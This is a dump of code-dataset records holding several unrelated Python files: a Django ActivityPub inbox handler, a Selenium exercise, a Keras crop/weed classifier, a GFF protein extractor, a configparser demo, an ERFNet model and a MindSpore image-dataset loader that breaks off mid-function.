TODO: should do some kind of checking if the user accepts\n # this action from the sender probably? idk\n # but this will just throw a 404 if the user doesn't exist\n try:\n models.User.objects.get(localname=username)\n except models.User.DoesNotExist:\n return HttpResponseNotFound()\n\n return shared_inbox(request)\n\n\n@csrf_exempt\ndef get_actor(request, username):\n ''' return an activitypub actor object '''\n if request.method != 'GET':\n return HttpResponseBadRequest()\n\n try:\n user = models.User.objects.get(localname=username)\n except models.User.DoesNotExist:\n return HttpResponseNotFound()\n return JsonResponse(activitypub.get_actor(user))\n\n\n@csrf_exempt\ndef get_status(request, username, status_id):\n ''' return activity json for a specific status '''\n if request.method != 'GET':\n return HttpResponseBadRequest()\n\n try:\n user = models.User.objects.get(localname=username)\n status = models.Status.objects.get(id=status_id)\n except ValueError:\n return HttpResponseNotFound()\n\n if user != status.user:\n return HttpResponseNotFound()\n\n return JsonResponse(activitypub.get_status(status))\n\n\n@csrf_exempt\ndef get_replies(request, username, status_id):\n ''' ordered collection of replies to a status '''\n # TODO: this isn't a full implmentation\n if request.method != 'GET':\n return HttpResponseBadRequest()\n\n status = models.Status.objects.get(id=status_id)\n if status.user.localname != username:\n return HttpResponseNotFound()\n\n replies = models.Status.objects.filter(\n reply_parent=status\n ).first()\n\n replies_activity = activitypub.get_replies(status, [replies])\n return JsonResponse(replies_activity)\n\n\n@csrf_exempt\ndef get_followers(request, username):\n ''' return a list of followers for an actor '''\n if request.method != 'GET':\n return HttpResponseBadRequest()\n\n user = models.User.objects.get(localname=username)\n followers = user.followers\n page = request.GET.get('page')\n return JsonResponse(activitypub.get_followers(user, page, followers))\n\n\n@csrf_exempt\ndef get_following(request, username):\n ''' return a list of following for an actor '''\n if request.method != 'GET':\n return HttpResponseBadRequest()\n\n user = models.User.objects.get(localname=username)\n following = models.User.objects.filter(followers=user)\n page = request.GET.get('page')\n return JsonResponse(activitypub.get_following(user, page, following))\n\n\ndef handle_incoming_follow(activity):\n ''' someone wants to follow a local user '''\n # figure out who they want to follow\n to_follow = models.User.objects.get(actor=activity['object'])\n # figure out who they are\n user = get_or_create_remote_user(activity['actor'])\n # TODO: allow users to manually approve requests\n try:\n models.UserRelationship.objects.create(\n user_subject=to_follow,\n user_object=user,\n status='follow_request',\n relationship_id=activity['id']\n )\n except django.db.utils.IntegrityError:\n # Duplicate follow request. Not sure what the correct behaviour is, but\n # just dropping it works for now. We should perhaps generate the\n # Accept, but then do we need to match the activity id?\n return HttpResponse()\n\n outgoing.handle_outgoing_accept(user, to_follow, activity)\n return HttpResponse()\n\n\ndef handle_incoming_undo(activity):\n ''' unfollow a local user '''\n obj = activity['object']\n if not obj['type'] == 'Follow':\n #idk how to undo other things\n return HttpResponseNotFound()\n try:\n requester = get_or_create_remote_user(obj['actor'])\n to_unfollow = models.User.objects.get(actor=obj['object'])\n except models.User.DoesNotExist:\n return HttpResponseNotFound()\n\n to_unfollow.followers.remove(requester)\n return HttpResponse()\n\n\ndef handle_incoming_follow_accept(activity):\n ''' hurray, someone remote accepted a follow request '''\n # figure out who they want to follow\n requester = models.User.objects.get(actor=activity['object']['actor'])\n # figure out who they are\n accepter = get_or_create_remote_user(activity['actor'])\n\n accepter.followers.add(requester)\n return HttpResponse()\n\n\ndef handle_incoming_create(activity):\n ''' someone did something, good on them '''\n user = get_or_create_remote_user(activity['actor'])\n\n if not 'object' in activity:\n return HttpResponseBadRequest()\n\n # TODO: should only create notes if they are relevent to a book,\n # so, not every single thing someone posts on mastodon\n response = HttpResponse()\n content = activity['object'].get('content')\n if activity['object'].get('fedireadsType') == 'Review' and \\\n 'inReplyToBook' in activity['object']:\n book = activity['object']['inReplyToBook']\n book = book.split('/')[-1]\n name = activity['object'].get('name')\n rating = activity['object'].get('rating')\n if user.local:\n review_id = activity['object']['id'].split('/')[-1]\n models.Review.objects.get(id=review_id)\n else:\n try:\n create_review(user, book, name, content, rating)\n except ValueError:\n return HttpResponseBadRequest()\n elif not user.local:\n try:\n create_status(user, content)\n except ValueError:\n return HttpResponseBadRequest()\n\n return response\n\n\ndef handle_incoming_favorite(activity):\n ''' approval of your good good post '''\n try:\n status_id = activity['object'].split('/')[-1]\n status = models.Status.objects.get(id=status_id)\n liker = get_or_create_remote_user(activity['actor'])\n except (models.Status.DoesNotExist, models.User.DoesNotExist):\n return HttpResponseNotFound()\n\n if not liker.local:\n status.favorites.add(liker)\n return HttpResponse()\n\n\ndef handle_incoming_add(activity):\n ''' someone is tagging or shelving a book '''\n if activity['object']['type'] == 'Tag':\n user = get_or_create_remote_user(activity['actor'])\n if not user.local:\n book = activity['target']['id'].split('/')[-1]\n create_tag(user, book, activity['object']['name'])\n return HttpResponse()\n return HttpResponse()\n return HttpResponseNotFound()\n\n\ndef handle_incoming_accept(activity):\n ''' someone is accepting a follow request '''\n # our local user\n user = models.User.objects.get(actor=activity['actor'])\n # the person our local user wants to follow, who said yes\n followed = get_or_create_remote_user(activity['object']['actor'])\n\n # save this relationship in the db\n followed.followers.add(user)\n\n return HttpResponse()\n\n","sub_path":"fedireads/incoming.py","file_name":"incoming.py","file_ext":"py","file_size_in_byte":10048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"460980408","text":"# Készíts egy Python alkalmazást ami selenium-ot használ.\n# Indítsd el lokálisan a selenium-py-peldatar alkalmazást.\n# A program töltse be a példatárból az http://localhost:9999/trickyelements.html oldalt.\n# Használj id lokátort és keressd ki az elemenekt egyesével.\n# A legelső olyan elemre ami button típusú kattints rá és ellenőrizd, hogy a helyes szöveg jelenik-e meg az elemek listája alatt.\n\nimport time\nfrom selenium import webdriver\n\nPATH = \"/usr/bin/chromedriver\"\nURL = (\"http://localhost:9999/trickyelements.html\")\n\nbrowser = webdriver.Chrome(PATH)\nbrowser.maximize_window()\nbrowser.get(URL)\n\ntry:\n i = 1\n while i <= 5:\n elem_id = browser.find_element_by_id(f'element{i}')\n\n if elem_id.tag_name == \"button\":\n elem_id.click()\n result = browser.find_element_by_id(\"result\")\n if result.text == f\"{elem_id.text} was clicked\":\n print(\"Első button:\", result.text)\n break\n else:\n print(f\"element{i}: hibás szöveg.\")\n else:\n print(f\"element{i}: gomb nem létezik.\")\n i = i + 1\n\nexcept:\n print(\"Something went wrong\")\n\nfinally:\n time.sleep(2)\n browser.quit()","sub_path":"selenium-homework/elementtype.py","file_name":"elementtype.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"553264587","text":"''' \nA Convolutional Network implementation example using TensorFlow library.\nThe image database used contains pictures of crops+weeds and only crops. \nAuthor: Ananya\nBased on :\n\n'''\nfrom __future__ import print_function\nimport keras\nfrom crop_weed_utils import crop_weed_data\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras import regularizers\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, AveragePooling2D\nimport h5py as h5py\nimport pandas as pd\nimport keras.backend as K\nfrom pprint import pprint\nimport os\nimport pickle\nimport numpy as np\n\nbatch_size = 32\nnum_classes = 2\nepochs = 200\ndata_augmentation = False\n# num_predictions = 20\nsave_dir = os.path.join(os.getcwd(), 'saved_models')\nmodel_name = 'keras_cropweedCNN_trained_model.h5'\n\n# The data, shuffled and split between train and test sets:\nx_train, y_train, x_test, y_test, x_val, y_val = crop_weed_data()\n# print('x_train shape:', x_train.shape)\n# print(x_train.shape[0], 'train samples')\n# print(x_test.shape[0], 'test samples')\n\n# Convert class vectors to binary class matrices.\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\ny_val = keras.utils.to_categorical(y_val, num_classes)\n\n# print(type(y_test))\n# for i in range(500,y_test.shape[0]):\n# print(y_test[i])\n\n# print('Actual Label = '+ str(y_test[3]))\nnum_predictions = y_val.shape[0]\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_val = x_val.astype('float32')\nx_train /= 255\nx_test /= 255\nx_val /= 255\n\n# pprint(y_test.tolist())\n\nmodel = Sequential()\nmodel.add(Conv2D(20, (4, 4), padding='same',\n input_shape=x_train.shape[1:]))\n# model.add(Activation('relu'))\n# model.add(BatchNormalization(momentum=0.99, epsilon=0.001))\nmodel.add(LeakyReLU(0.2))\nmodel.add(Conv2D(15, (4, 4)))\n# model.add(Activation('relu'))\n# model.add(BatchNormalization(momentum=0.99, epsilon=0.001))\nmodel.add(LeakyReLU(0.2))\nmodel.add(AveragePooling2D(pool_size=(4, 4)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(10, (4, 4), padding='same'))\n# model.add(Conv2D(10, (4, 4), padding='same', kernel_regularizer=regularizers.l2(0.001)))\n# model.add(BatchNormalization(momentum=0.99, epsilon=0.001))\n# model.add(Activation('relu'))\nmodel.add(LeakyReLU(0.2))\nmodel.add(Conv2D(10, (4, 4)))\n# model.add(BatchNormalization(momentum=0.99, epsilon=0.001))\n# model.add(Activation('relu'))\nmodel.add(LeakyReLU(0.2))\nmodel.add(AveragePooling2D(pool_size=(4, 4)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512))\n# model.add(Activation('relu'))\nmodel.add(LeakyReLU(0.2))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes))\nmodel.add(Activation('softmax'))\n\n# initiate RMSprop optimizer\nopt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)\n\n# Let's train the model using RMSprop\nmodel.compile(loss='categorical_crossentropy',\n optimizer=opt,\n metrics=['accuracy'])\n\n\n\n\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\nprint(x_val.shape[0], 'vaildation samples')\n\ncsvpath = os.path.join(\"output/cnn_crop_weed\", \"history.csv\")\nif os.path.exists(csvpath):\n print(\"Already exists: {}\".format(csvpath))\n # return\n\ncsv_logger = keras.callbacks.CSVLogger('training.log')\n\nprint('Not using data augmentation.')\nhistory=model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs, callbacks=[csv_logger],\n validation_data=(x_val, y_val),\n shuffle=True)\n\n# save history to CSV\ndf = pd.DataFrame(history.history)\ndf.to_csv(csvpath)\n\n\n'''\nif not data_augmentation:\n print('Not using data augmentation.')\n model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_test, y_test),\n shuffle=True)\nelse:\n print('Using real-time data augmentation.')\n # This will do preprocessing and realtime data augmentation:\n datagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=False) # randomly flip images\n\n # Compute quantities required for feature-wise normalization\n # (std, mean, and principal components if ZCA whitening is applied).\n datagen.fit(x_train)\n\n # Fit the model on the batches generated by datagen.flow().\n model.fit_generator(datagen.flow(x_train, y_train,\n batch_size=batch_size),\n steps_per_epoch=x_train.shape[0] // batch_size,\n epochs=epochs,\n validation_data=(x_test, y_test))\n'''\n# Save model and weights\nif not os.path.isdir(save_dir):\n os.makedirs(save_dir)\nmodel_path = os.path.join(save_dir, model_name)\nmodel.save(model_path)\nprint('Saved trained model at %s ' % model_path)\n\n\n# # Load label names to use in prediction results\n# label_list_path = 'datasets/cifar-10-batches-py/batches.meta'\n\n\nkeras_dir = os.path.expanduser(os.path.join('~', '.keras'))\ndatadir_base = os.path.expanduser(keras_dir)\nif not os.access(datadir_base, os.W_OK):\n datadir_base = os.path.join('/tmp', '.keras')\n# label_list_path = os.path.join(datadir_base, label_list_path)\n\n# with open(label_list_path, mode='rb') as f:\n# labels = pickle.load(f)\n\n# # Evaluate model with test data set and share sample prediction results\n# evaluation = model.evaluate_generator(datagen.flow(x_test, y_test,\n# batch_size=batch_size),\n# steps=x_test.shape[0] // batch_size)\n\n# Evaluate model with test data set and share sample prediction results\nevaluation = model.evaluate(x_test, y_test, batch_size=batch_size)\n\nprint('Model Accuracy = %.2f' % (evaluation[1]))\nprint(x_test.shape)\n# predict_gen = model.predict_generator(datagen.flow(x_test, y_test,\n# batch_size=batch_size),\n# steps=x_test.shape[0] // batch_size)\nprediction = model.predict(x_test, batch_size=batch_size) \n\n# for i in range(500,y_test.shape[0]):\n# print(str(y_test[i]))\n# i=1\nfor predict_index, predicted_y in enumerate(prediction):\n # actual_label = labels['label_names'][np.argmax(y_test[predict_index])]\n # predicted_label = labels['label_names'][np.argmax(predicted_y)]\n # actual_label = np.argmax(y_test[predict_index])\n # predicted_label = np.argmax(predicted_y)\n # print('Actual Label = %d vs. Predicted Label = %d' % (actual_label,\n # predicted_label))\n # print(y_test[i])\n # i=+1\n print(str(predict_index)+ 'Actual Label = '+ str(y_test[predict_index]) + 'vs. Predicted Label = ' +\n str(predicted_y))\n if predict_index == num_predictions:\n break\n\n","sub_path":"weed_crop_recogniser_CNN_forGreenImages.py","file_name":"weed_crop_recogniser_CNN_forGreenImages.py","file_ext":"py","file_size_in_byte":7660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"456191309","text":"import argparse\nimport os\nimport sys\nimport logging\nfrom itertools import groupby\nimport pysam\nfrom customFunctions import *\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Given a gff file, extract protein sequences based on transcript sequences'\n )\n \n parser.add_argument('gff', help='gff file input')\n parser.add_argument('transcripts', help='Fasta file of transcripts from which to fetch')\n parser.add_argument('-ts', '--trim_start', action='store_true', help='If enabled, trim the start of the protein to the nearest methionine amino acid')\n parser.add_argument(\"-l\", \"--log\", dest=\"logLevel\", default='warning', choices=['debug', 'info', 'warning', 'error', 'critical'], help='set the logging level. default = \"warning\"')\n parser.add_argument('-n', '--name', default='protein.tsv', help='Name for the file output. Default is \"protein.tsv\"')\n parser.add_argument('-o', '--outdir', default=os.getcwd(), help='Path to output to. Default is {}'.format(os.getcwd()))\n \n args = parser.parse_args()\n \n # Create output directory if it does not exist\n if not os.path.isdir(args.outdir):\n try:\n os.makedirs(args.outdir)\n except OSError:\n pass\n \n # Logging\n logging.basicConfig(\n filename = os.path.join(args.outdir, '{}.log'.format(os.path.basename(__file__))),\n level = getattr(logging, args.logLevel.upper()),\n filemode = 'w'\n )\n \n # Open transcripts fasta\n transcripts = pysam.FastaFile(args.transcripts)\n \n # Load gff into Pysam object\n gff = Gff.read(args.gff)\n \n # Sorting GFF is annoying in bash alone,\n # so I opt to store it in memory and then spit it back\n # out per transcript\n txts = {}\n\n with open(os.path.join(args.outdir, args.name), 'w') as o:\n for line in gff:\n if line.feature != 'CDS':\n continue\n name = line.attribute['Parent']\n if name not in txts:\n txts[name] = [line] \n else:\n txts[name].append(line)\n for txt in txts:\n logging.debug('txt: {}'.format(txt))\n txts[txt] = sorted(txts[txt], key = lambda x: x.start)\n # for x in txts[txt]:\n # logging.debug('x: {}'.format(x))\n strand = txts[txt][0].strand\n cds = txts[txt]\n if not cds:\n logging.warning('Transcript \"{}\"\" has no CDS!'.format(txt))\n continue\n seq = ('').join([transcripts.fetch(x.seqname, x.start-1, x.end) for x in cds])\n if strand == '-':\n seq = rev_comp(seq)\n aa = trans(seq)\n # Strip '-' suffix\n aa = aa.strip('-')\n # Trim sequence to nearest methionine\n if args.trim_start:\n try:\n aa = aa[aa.index('M'):]\n except ValueError:\n logging.warning(\n 'Sequence \"{}\" has no methionine. {}'.format(\n aa,\n txt\n )\n )\n logging.debug('aa: {}'.format(aa))\n o.write(\n ('\\t').join((\n cds[0].seqname,\n txt,\n aa\n )) + '\\n'\n )\n\n# with open(os.path.join(args.outdir, args.name), 'w') as o:\n# for key, group in groupby(\n# gff,\n# #key = lambda entry: dict([x.split('=') for x in entry.attributes.split(';')])['Name']\n# key = lambda entry: dict([x.split('=') for x in entry.attributes.split('; ')])['Name']\n# ):\n# logging.debug('Group key: \"{}\"'.format(key))\n# temp = [x for x in group]\n# for x in temp:\n# logging.debug('\\tx: {}'.format(x))\n# cds = [x for x in temp if x.feature == 'CDS']\n# #cds = [x for x in group if x.feature == 'CDS']\n# logging.debug('cds: {}'.format(cds))\n# strand = cds[0].strand\n# logging.debug('strand: {}'.format(strand))\n# if strand == '+':\n# seq = ('').join([transcripts.fetch(x.contig, x.start, x.end) for x in cds])\n# else:\n# if len(cds) > 1:\n# seq = ('').join([transcripts.fetch(x.contig, x.start, x.end)[::-1] for x in cds])\n# seq = comp(seq)\n# else:\n# seq = ('').join([transcripts.fetch(x.contig, x.start, x.end) for x in cds])\n# seq = rev_comp(seq)\n# aa = trans(seq)\n# # Strip '-' suffix\n# aa = aa.strip('-')\n# logging.debug('key: {}'.format(key))\n# logging.debug('seq: {}'.format(seq))\n# # Trim sequence to nearest methionine\n# if args.trim_start:\n# try:\n# aa = aa[aa.index('M'):]\n# except ValueError:\n# logging.warning(\n# 'Sequence \"{}\" has no methionine. {}'.format(\n# aa,\n# key\n# )\n# )\n# logging.debug('aa: {}'.format(aa))\n# o.write(\n# ('\\t').join((\n# cds[0].contig,\n# key,\n# aa\n# )) + '\\n'\n# )\n","sub_path":"getProteinFromGff.py","file_name":"getProteinFromGff.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"290295837","text":"#-*- coding: utf-8 -*-\nfrom configparser import ConfigParser\n\ncfg = ConfigParser()\ncfg.optionxform = str # 默认会将key全部转换为lowercase, 添加此配置保持case\ncfg.read('config.ini')\n\n'''\n默认全部的value被当做字符串处理\nc.get \nc.getboolean \nc.getfloat \nc.getint\n\n字符串插值\n BasicInterpolation\n 需要在相同section或[DEFAULT]\n %(var)s\n ExtendedInterpolation\n ${var}\n 可以跨section\n\n c = ConfigParser()\n c._DEFAULT_INTERPOLATION = configparser.ExtendedInterpolation\n'''\nprint(cfg.sections())\nprint(cfg.get('installation', 'library'))\nprint(cfg.getboolean('debug', 'log_errors'))\ncfg.set('server','host','127.0.0.1')\ncfg.set('server','port','2000')\ncfg['Paths'].get('home_dir')\n\nwith open('config.ini','wt') as f:\n cfg.write(f)\n","sub_path":"backend/python/configparse/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"628852963","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torch.nn.functional as F\nfrom torch.quantization import QuantStub, DeQuantStub\nfrom torch.nn.quantized import FloatFunctional\n\nclass DownsamplerBlock(nn.Module):\n def __init__(self, ninput, noutput) -> None:\n super(DownsamplerBlock, self).__init__()\n self.conv = nn.Conv2d(ninput, noutput-ninput, (3,3), stride=2, padding=1, bias=True)\n self.pool = nn.MaxPool2d(2, stride=2)\n self.bn = nn.BatchNorm2d(noutput, eps=1e-3)\n def forward(self, input):\n output = torch.cat([self.conv(input), self.pool(input)], axis=1)\n output = self.bn(output)\n return F.relu(output)\n \n\nclass non_bottleneck_1d(nn.Module):\n def __init__(self, chann, dropprob, dilated) -> None:\n super(non_bottleneck_1d, self).__init__()\n self.conv3x1_1 = nn.Conv2d(chann, chann, (3,1), stride=1, padding=(1,0), bias=True)\n \n self.conv1x3_1 = nn.Conv2d(chann, chann, (1,3),stride=1, padding=(0,1), bias= True)\n \n self.bn1 = nn.BatchNorm2d(chann, eps=1e-03)\n \n self.conv3x1_2 = nn.Conv2d(chann, chann, (3,1), stride=1, padding=(1*dilated,0), bias=True, dilation=(dilated,1))\n \n self.conv1x3_2 = nn.Conv2d(chann, chann,(1,3), stride= 1, padding=(0, 1*dilated), bias=True, dilation=(1, dilated))\n \n self.bn2 = nn.BatchNorm2d(chann, eps=1e-03)\n \n self.dropout = nn.Dropout2d(dropprob)\n \n \n def forward(self, input):\n output = self.conv3x1_1(input)\n output = F.relu(output)\n output = self.conv1x3_1(output)\n output = self.bn1(output)\n output = F.relu(output)\n \n output = self.conv3x1_2(output)\n output = F.relu(output)\n output = self.conv1x3_2(output)\n output = self.bn2(output)\n \n if self.dropout.p !=0:\n output = self.dropout(output)\n \n return F.relu(output +input)\n \n\nclass Encoder(nn.Module):\n def __init__(self, num_classes) -> None:\n super(Encoder, self).__init__()\n \n self.initial_block = DownsamplerBlock(3,16)\n \n self.layers = nn.ModuleList()\n \n self.layers.append(DownsamplerBlock(16,64))\n \n for x in range(0,5):\n self.layers.append(non_bottleneck_1d(64,0.03, 1))\n \n self.layers.append(DownsamplerBlock(64, 128))\n \n for x in range(0, 2):\n self.layers.append(non_bottleneck_1d(128,0.3,2))\n self.layers.append(non_bottleneck_1d(128, 0.3, 4))\n self.layers.append(non_bottleneck_1d(128,0.3, 8))\n self.layers.append(non_bottleneck_1d(128, 0.3, 16))\n \n self.output_conv = nn.Conv2d(128, num_classes, 1, stride=1, padding=0, bias=True)\n \n \n def forward(self, input, predict=False):\n output = self.initial_block(input)\n \n for layer in self.layers:\n output = layer(output)\n \n if predict:\n output = self.output_conv(output)\n \n return output\n \n \nclass UpsamplerBlock(nn.Module):\n def __init__(self, ninput, noutput) -> None:\n super(UpsamplerBlock, self).__init__()\n self.conv = nn.ConvTranspose2d(ninput, noutput, 3, stride= 2, padding=1, output_padding=1, bias=True)\n \n self.bn = nn.BatchNorm2d(noutput, eps=1e-3)\n \n \n def forward(self, input):\n output = self.conv(input)\n output = self.bn(output)\n return F.relu(output)\n \n\nclass Decoder(nn.Module):\n def __init__(self, num_classes) -> None:\n super(Decoder, self).__init__()\n \n self.layers = nn.ModuleList()\n \n self.layers.append(UpsamplerBlock(128, 64))\n self.layers.append(non_bottleneck_1d(64,0,1))\n self.layers.append(non_bottleneck_1d(64,0,1))\n \n self.layers.append(UpsamplerBlock(64, 16))\n self.layers.append(non_bottleneck_1d(16,0,1))\n self.layers.append(non_bottleneck_1d(16,0,1))\n \n self.output_conv = nn.ConvTranspose2d(16, num_classes, 2,stride=2,padding= 0, output_padding=0, bias=True)\n \n def forward(self, input):\n \n output = input\n \n for layer in self.layers:\n output = layer(output)\n \n output = self.output_conv(output)\n \n return output\n \nclass ERFNet(nn.Module):\n def __init__(self, num_classes= 4, encoder=None) -> None:\n super(ERFNet, self).__init__()\n \n if encoder == None:\n self.encoder = Encoder(num_classes)\n else:\n self.encoder = encoder\n \n self.decoder = Decoder(num_classes)\n \n def forward(self, input, only_encode = False):\n if only_encode:\n return self.encoder.forward(input, predict=True)\n else:\n ouput = self.encoder(input)\n return self.decoder.forward(ouput)\n \n \n \n \n \n \n \n \n \n \n ","sub_path":"models/erfnet.py","file_name":"erfnet.py","file_ext":"py","file_size_in_byte":5088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"116925031","text":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\nData operations, will be used in train.py and eval.py\n\"\"\"\nimport glob\nimport os\nimport random\nimport re\nfrom functools import reduce\n\nimport mindspore.dataset as ds\nimport numpy as np\nfrom PIL import Image\n\n\ndef get_rank_info():\n \"\"\"\n get rank size and rank id\n \"\"\"\n from model_utils.moxing_adapter import get_rank_id, get_device_num\n return get_device_num(), get_rank_id()\n\n\nclass FolderImagePair:\n \"\"\"\n get image pair\n dir_patterns(list): a list of image path patterns. such as [\"/LR/*.jpg\", \"/HR/*.png\"...]\n the file key is matched chars from * and ?\n reader(object/func): a method to read image by path.\n \"\"\"\n\n def __init__(self, dir_patterns, reader=None):\n self.dir_patterns = dir_patterns\n self.reader = reader\n self.pair_keys, self.image_pairs = self.scan_pair(self.dir_patterns)\n\n @staticmethod\n def scan_pair(dir_patterns):\n \"\"\"\n scan pair\n \"\"\"\n images = []\n for _dir in dir_patterns:\n imgs = glob.glob(_dir)\n _dir = os.path.basename(_dir)\n pat = _dir.replace(\"*\", \"(.*)\").replace(\"?\", \"(.?)\")\n pat = re.compile(pat, re.I | re.M)\n keys = [re.findall(pat, os.path.basename(p))[0] for p in imgs]\n images.append({k: v for k, v in zip(keys, imgs)})\n same_keys = reduce(lambda x, y: set(x) & set(y), images)\n same_keys = sorted(same_keys)\n image_pairs = [[d[k] for d in images] for k in same_keys]\n same_keys = [x if isinstance(x, str) else \"_\".join(x) for x in same_keys]\n return same_keys, image_pairs\n\n def get_key(self, idx):\n return self.pair_keys[idx]\n\n def __getitem__(self, idx):\n if self.reader is None:\n images = [Image.open(p) for p in self.image_pairs[idx]]\n images = [img.convert('RGB') for img in images]\n images = [np.array(img) for img in images]\n else:\n images = [self.reader(p) for p in self.image_pairs[idx]]\n pair_key = self.pair_keys[idx]\n return (pair_key, *images)\n\n def __len__(self):\n return len(self.pair_keys)\n\n\nclass LrHrImages(FolderImagePair):\n \"\"\"\n make LrHrImages dataset\n \"\"\"\n\n def __init__(self, lr_pattern, hr_pattern, reader=None):\n self.hr_pattern = hr_pattern\n self.lr_pattern = lr_pattern\n self.dir_patterns = []\n if isinstance(self.lr_pattern, str):\n self.is_multi_lr = False\n self.dir_patterns.append(self.lr_pattern)\n elif len(lr_pattern) == 1:\n self.is_multi_lr = False\n self.dir_patterns.append(self.lr_pattern[0])\n else:\n self.is_multi_lr = True\n self.dir_patterns.extend(self.lr_pattern)\n self.dir_patterns.append(self.hr_pattern)\n super(LrHrImages, self).__init__(self.dir_patterns, reader=reader)\n\n def __getitem__(self, idx):\n _, *images = super(LrHrImages, self).__getitem__(idx)\n return tuple(images)\n\n\nclass _BasePatchCutter:\n \"\"\"\n cut patch from images\n patch_size(int): patch size, input images should be bigger than patch_size.\n lr_scale(int/list): lr scales for input images. Choice from [1,2,3,4, or their combination]\n \"\"\"\n\n def __init__(self, patch_size, lr_scale):\n self.patch_size = patch_size\n self.multi_lr_scale = lr_scale\n if isinstance(lr_scale, int):\n self.multi_lr_scale = [lr_scale]\n else:\n self.multi_lr_scale = [*lr_scale]\n self.max_lr_scale_idx = self.multi_lr_scale.index(max(self.multi_lr_scale))\n self.max_lr_scale = self.multi_lr_scale[self.max_lr_scale_idx]\n\n def get_tx_ty(self, target_height, target_weight, target_patch_size):\n raise NotImplementedError()\n\n def __call__(self, *images):\n target_img = images[self.max_lr_scale_idx]\n\n tp = self.patch_size // self.max_lr_scale\n th, tw, _ = target_img.shape\n\n tx, ty = self.get_tx_ty(th, tw, tp)\n\n patch_images = []\n for _, (img, lr_scale) in enumerate(zip(images, self.multi_lr_scale)):\n x = tx * self.max_lr_scale // lr_scale\n y = ty * self.max_lr_scale // lr_scale\n p = tp * self.max_lr_scale // lr_scale\n patch_images.append(img[y:(y + p), x:(x + p), :])\n return tuple(patch_images)\n\n\nclass RandomPatchCutter(_BasePatchCutter):\n\n def __init__(self, patch_size, lr_scale):\n super(RandomPatchCutter, self).__init__(patch_size=patch_size, lr_scale=lr_scale)\n\n def get_tx_ty(self, target_height, target_weight, target_patch_size):\n target_x = random.randrange(0, target_weight - target_patch_size + 1)\n target_y = random.randrange(0, target_height - target_patch_size + 1)\n return target_x, target_y\n\n\nclass CentrePatchCutter(_BasePatchCutter):\n\n def __init__(self, patch_size, lr_scale):\n super(CentrePatchCutter, self).__init__(patch_size=patch_size, lr_scale=lr_scale)\n\n def get_tx_ty(self, target_height, target_weight, target_patch_size):\n target_x = (target_weight - target_patch_size) // 2\n target_y = (target_height - target_patch_size) // 2\n return target_x, target_y\n\n\ndef hflip(img):\n return img[:, ::-1, :]\n\n\ndef vflip(img):\n return img[::-1, :, :]\n\n\ndef trnsp(img):\n return img.transpose(1, 0, 2)\n\n\nAUG_LIST = [\n [],\n [trnsp],\n [vflip],\n [vflip, trnsp],\n [hflip],\n [hflip, trnsp],\n [hflip, vflip],\n [hflip, vflip, trnsp],\n]\n\nAUG_DICT = {\n \"0\": [],\n \"t\": [trnsp],\n \"v\": [vflip],\n \"vt\": [vflip, trnsp],\n \"h\": [hflip],\n \"ht\": [hflip, trnsp],\n \"hv\": [hflip, vflip],\n \"hvt\": [hflip, vflip, trnsp],\n}\n\n\ndef flip_and_rotate(*images):\n aug = random.choice(AUG_LIST)\n res = []\n for img in images:\n for a in aug:\n img = a(img)\n res.append(img)\n return tuple(res)\n\n\ndef hwc2chw(*images):\n res = [i.transpose(2, 0, 1) for i in images]\n return tuple(res)\n\n\ndef uint8_to_float32(*images):\n res = [(i.astype(np.float32) if i.dtype == np.uint8 else i) for i in images]\n return tuple(res)\n\n\ndef create_dataset_DIV2K(config, dataset_type=\"train\", num_parallel_workers=10, shuffle=True):\n \"\"\"\n create a train or eval DIV2K dataset\n Args:\n config(dict):\n dataset_path(string): the path of dataset.\n scale(int/list): lr scale, read data ordered by it, choices=(2,3,4,[2],[3],[4],[2,3],[2,4],[3,4],[2,3,4])\n lr_type(string): lr images type, choices=(\"bicubic\", \"unknown\"), Default \"bicubic\"\n batch_size(int): the batch size of 